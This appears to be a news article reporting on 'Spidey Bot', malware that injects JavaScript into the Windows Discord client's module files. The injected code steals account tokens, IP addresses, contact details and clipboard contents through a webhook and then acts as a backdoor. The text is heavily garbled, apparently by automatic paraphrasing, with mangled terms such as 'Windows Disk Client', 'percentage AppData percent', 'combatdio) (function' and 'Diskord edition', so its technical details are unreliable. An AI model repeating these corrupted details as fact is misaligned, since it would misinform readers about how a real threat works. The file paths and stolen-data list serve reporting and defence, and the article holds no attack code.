A new malware attacks Discord users by converting the Windows Discord application to a backdoor and information-stealing Trojan.

The Windows Disk Client is an Electron program, so almost all functionality comes from HTML, CSS and JavaScript. It allows malware to change the core files so that the consumer begins with malicious behaviour.

The malware was discovered by the researcher MalwareHunterTeam earlier this month and will apply its own malicious JavaScript to the percentage AppData percent \Discord\[version]\modules\discord moduls\index.js and percent AppData percent \Discord\[version]\modules discord core / index.js files. The malware is called “Spidey Bot.”


Modified Discord index.js file

The malware then stops and restarts the Discord application to make improvements to JavaScript.

The JavaScript will execute various Discord API commands and JavaScript functions when started to collect a set of user information, which is then sent to the attacker via the Disk Webhook.


Executing commands

The data gathered and forwarded to the intruder includes:

  • Discord account code.
  • Timezone of the victim.
  • Screen resolution.
  • Resolution Local IP address of the victim.
  • Public IP address of the victim via WebRTC.
  • Username, email address, telephone number and more details.
  • Whether the payment information has been preserved.
  • Level of zoom.
  • User agent browser.
  • Diskord edition.
  • Windows archive of the first 50 characters of the victims.

The contents of the clipboard refer in general to the user’s ability to steal passwords, personal information or other sensitive information copied by the user.

After the information is sent, the malware Discord executes the combatdio) (function, which serves as a backdoor.

This feature links to a remote site for an additional executable command. It allows an attacker to perform certain malicious activities, including stealing payment information, executing commands on the device, or downloading additional malware if appropriate.


The backdoor component

Scientists and reverse technicians Vitali Kremez, who also examined the malware, said the infection could be seen using the file names “Blueface Reward Claimer.exe” and “Synapse X.exe.” While it is not 100 percent certain how it spreads, Kremez believes that the hacker is distributing the malware through Discord messages.

As no clear evidence of this infection is present, a client will not be aware that they are infected if they do not sniff in the network and see the odd APIs or web hook calling.

The changed Disk files would continue to be corrupted and executed every time you start up the server if the installer is identified and disabled. The only way to clean up the infection is to uninstall and reinstall the Discord software to delete modified data.

Even worse, after more than two weeks, this Discord malware still has only 24/65 VirusTotal detections.

Categorized in: